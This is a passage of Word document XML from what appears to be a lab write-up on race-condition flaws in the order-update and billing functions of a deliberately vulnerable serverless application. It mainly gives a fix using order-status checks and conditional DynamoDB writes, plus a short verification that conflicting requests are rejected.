        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="009B41FC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D90B21">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="009B41FC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009B41FC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: prepare order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BD7068" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="1495D761" w14:textId="77777777" w:rsidR="00EC326A" w:rsidRDefault="00EC326A" w:rsidP="00EC326A">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1018971F" wp14:editId="2986BA35">
            <wp:extent cx="5943600" cy="2133307"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="17639374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133307"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="753A8443" w14:textId="641A4FA8" w:rsidR="00EC326A" w:rsidRDefault="00EC326A" w:rsidP="00EC326A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC326A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC326A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00EC326A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00EC326A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D90B21">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC326A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00EC326A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Ensure billing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686DE14E" w14:textId="77777777" w:rsidR="00C2363F" w:rsidRDefault="00C2363F" w:rsidP="00C2363F"/>
    <w:p w14:paraId="65C885B3" w14:textId="77777777" w:rsidR="00512056" w:rsidRDefault="00512056" w:rsidP="00512056">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FD69659" wp14:editId="3CAC9BC5">
            <wp:extent cx="5943600" cy="2256211"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17372652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256211"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="162F6040" w14:textId="50518330" w:rsidR="00C2363F" w:rsidRDefault="00512056" w:rsidP="00512056">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00512056">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00512056">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00512056">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00512056">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D90B21">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00512056">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00512056">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00EA519A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D90C9A2" w14:textId="76942636" w:rsidR="006F431D" w:rsidRPr="006F431D" w:rsidRDefault="006F431D" w:rsidP="006F431D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="36808C12" w14:textId="69F6349B" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:lastRenderedPageBreak/>
        <w:t>Fix Strategy / Probable Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05241A84" w14:textId="608A2ECC" w:rsidR="006F431D" w:rsidRDefault="006F431D" w:rsidP="006F431D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>The correct mitigation is to enforce strict server-side state transitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5519DCA5" w14:textId="77777777" w:rsidR="006F431D" w:rsidRDefault="006F431D" w:rsidP="006F431D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>update must only be allowed while the order is still open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C32839A" w14:textId="77777777" w:rsidR="006F431D" w:rsidRDefault="006F431D" w:rsidP="006F431D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>billing must only be allowed while the order is still open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EF86BC" w14:textId="77777777" w:rsidR="006F431D" w:rsidRDefault="006F431D" w:rsidP="006F431D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>once billing starts or the order becomes paid, conflicting updates must fail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7109F4D8" w14:textId="695E4501" w:rsidR="006F431D" w:rsidRDefault="006F431D" w:rsidP="006F431D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>use conditional writes in DynamoDB so the state is validated atomically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E922730" w14:textId="260300CD" w:rsidR="00BA72A1" w:rsidRDefault="006F431D" w:rsidP="006F431D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This addresses the root cause </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>by</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> making workflow state enforcement happen at the point of update, not after the order has already moved forward.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552C5CEC" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="6796CFD0" w14:textId="3F83F2C2" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Code / Config Changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A480772" w14:textId="1656F7E6" w:rsidR="00C6482E" w:rsidRPr="00C6482E" w:rsidRDefault="00C6482E" w:rsidP="00C6482E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C6482E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fixed DVSA-ORDER-UPDATE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AF5F46" w14:textId="774CA24A" w:rsidR="00383415" w:rsidRDefault="00383415" w:rsidP="00383415">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Main security </w:t>
      </w:r>
      <w:r w:rsidR="0058607E">
        <w:t>changes</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE6EA74" w14:textId="77777777" w:rsidR="00383415" w:rsidRDefault="00383415" w:rsidP="00383415">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">require </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>orderStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> == 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BD3ECD" w14:textId="77777777" w:rsidR="00383415" w:rsidRDefault="00383415" w:rsidP="00383415">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ConditionExpression</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>orderStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = :</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>expectedStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27306589" w14:textId="621F366E" w:rsidR="00BA72A1" w:rsidRDefault="00383415" w:rsidP="00383415">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>reject invalid transitions with invalid state transition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4426C8C2" w14:textId="013C1709" w:rsidR="00BA72A1" w:rsidRDefault="00547D7A" w:rsidP="00547D7A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00547D7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0248FDAD" w14:textId="77777777" w:rsidR="00547D7A" w:rsidRDefault="00547D7A" w:rsidP="00547D7A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>current_status</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> != 100:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9AA8D9" w14:textId="453892B0" w:rsidR="00547D7A" w:rsidRDefault="00547D7A" w:rsidP="00547D7A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return {"status": "err", "msg": "invalid state transition"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666C899B" w14:textId="77777777" w:rsidR="00547D7A" w:rsidRDefault="00547D7A" w:rsidP="00547D7A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B38C203" w14:textId="15598C80" w:rsidR="004A4DDC" w:rsidRDefault="004A4DDC" w:rsidP="004A4DDC">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="004A4DDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>And in the DynamoDB update:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE5A544" w14:textId="07EF3A2E" w:rsidR="004A4DDC" w:rsidRPr="004A4DDC" w:rsidRDefault="004A4DDC" w:rsidP="004A4DDC">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A4DDC">
        <w:t>ConditionExpression</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A4DDC">
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A4DDC">
        <w:t>orderStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A4DDC">
        <w:t xml:space="preserve"> = :</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A4DDC">
        <w:t>expectedStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A4DDC">
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1031652F" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="0D1FC5E5" w14:textId="77777777" w:rsidR="00C70F85" w:rsidRDefault="00C70F85" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="35B3B615" w14:textId="77777777" w:rsidR="00C70F85" w:rsidRDefault="00C70F85" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="6F1BE96E" w14:textId="7AA20AEF" w:rsidR="00C70F85" w:rsidRDefault="00C70F85" w:rsidP="00C70F85">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C70F85">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fixed DVSA-ORDER-BILLING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F57237B" w14:textId="44D025F7" w:rsidR="00C70F85" w:rsidRDefault="00C70F85" w:rsidP="00C70F85">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Main security </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>change</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF8E2D3" w14:textId="77777777" w:rsidR="00C70F85" w:rsidRDefault="00C70F85" w:rsidP="00C70F85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">require </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>orderStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> == 100 before billing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33229AE2" w14:textId="77777777" w:rsidR="00C70F85" w:rsidRDefault="00C70F85" w:rsidP="00C70F85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>use a conditional DynamoDB update to ensure the order is still open at commit time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F0EB90" w14:textId="50115AAB" w:rsidR="00C70F85" w:rsidRDefault="00C70F85" w:rsidP="00C70F85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>reject conflicting transitions with invalid state transition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A40F87C" w14:textId="6F899EC5" w:rsidR="00C70F85" w:rsidRDefault="00C70F85" w:rsidP="00C70F85">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A252EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCA0FE9" w14:textId="77777777" w:rsidR="00A252EB" w:rsidRDefault="00A252EB" w:rsidP="00A252EB">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>if status != 100:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E9DD24" w14:textId="45D14592" w:rsidR="00A252EB" w:rsidRDefault="00A252EB" w:rsidP="00A252EB">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return {"status": "err", "msg": "invalid state transition"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A496CAD" w14:textId="77777777" w:rsidR="00A252EB" w:rsidRDefault="00A252EB" w:rsidP="00A252EB">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B0F1A2E" w14:textId="290015FE" w:rsidR="00A252EB" w:rsidRDefault="00A252EB" w:rsidP="00A252EB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A252EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>And in the DynamoDB update:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE6AD60" w14:textId="67606E46" w:rsidR="00A252EB" w:rsidRDefault="00A252EB" w:rsidP="00A252EB">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A252EB">
        <w:t>ConditionExpression</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A252EB">
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A252EB">
        <w:t>orderStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A252EB">
        <w:t xml:space="preserve"> = :</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A252EB">
        <w:t>expectedStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A252EB">
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC7B296" w14:textId="77777777" w:rsidR="00A55ACA" w:rsidRPr="00A252EB" w:rsidRDefault="00A55ACA" w:rsidP="00A252EB">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E05D4BE" w14:textId="56BC55F1" w:rsidR="00A252EB" w:rsidRPr="00C70F85" w:rsidRDefault="00A55ACA" w:rsidP="00A55ACA">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A55ACA">
        <w:t>These changes moved the system from weak timing-dependent checks to explicit workflow enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6AA868" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="1C92FFAA" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="6F9D60E6" w14:textId="00EF1A8F" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00F57F67">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Verification After Fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8B4547" w14:textId="77777777" w:rsidR="00B63DE6" w:rsidRDefault="00B63DE6" w:rsidP="00B63DE6">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2154A537" wp14:editId="4752EC32">
            <wp:extent cx="5943600" cy="1981419"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15284623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981419"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CED9406" w14:textId="77777777" w:rsidR="00B63DE6" w:rsidRPr="00D90B21" w:rsidRDefault="00B63DE6" w:rsidP="00B63DE6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D90B21">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00D90B21">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D90B21">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D90B21">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D90B21">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00D90B21">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D90B21">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Exploit after fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777756C2" w14:textId="5FB4EAF2" w:rsidR="00BA72A1" w:rsidRDefault="00146B65" w:rsidP="00BA72A1">
      <w:r w:rsidRPr="00146B65">
        <w:t>After the fix, conflicting requests were no longer freely accepted. Once the order state changed, later attempts were rejected with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B2230B" w14:textId="4B2B5A82" w:rsidR="00146B65" w:rsidRDefault="00146B65" w:rsidP="00FD6CA5">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00146B65">
        <w:t>{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00146B65">
        <w:t>status":"err","msg":"invalid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00146B65">
        <w:t xml:space="preserve"> state transition"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BB7531" w14:textId="58A1265D" w:rsidR="00FD6CA5" w:rsidRDefault="00FD6CA5" w:rsidP="00FD6CA5">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>That confirms the server now enforces state transitions explicitly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BAF2E6" w14:textId="35320A95" w:rsidR="00E73233" w:rsidRDefault="00E73233" w:rsidP="00CA2842">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B0E760" w14:textId="1CD8C2F4" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:lastRenderedPageBreak/>
        <w:t>Structured Operation and Security Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187C3821" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="2DB8D432" w14:textId="2CFC7F12" w:rsidR="00D84B64" w:rsidRPr="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
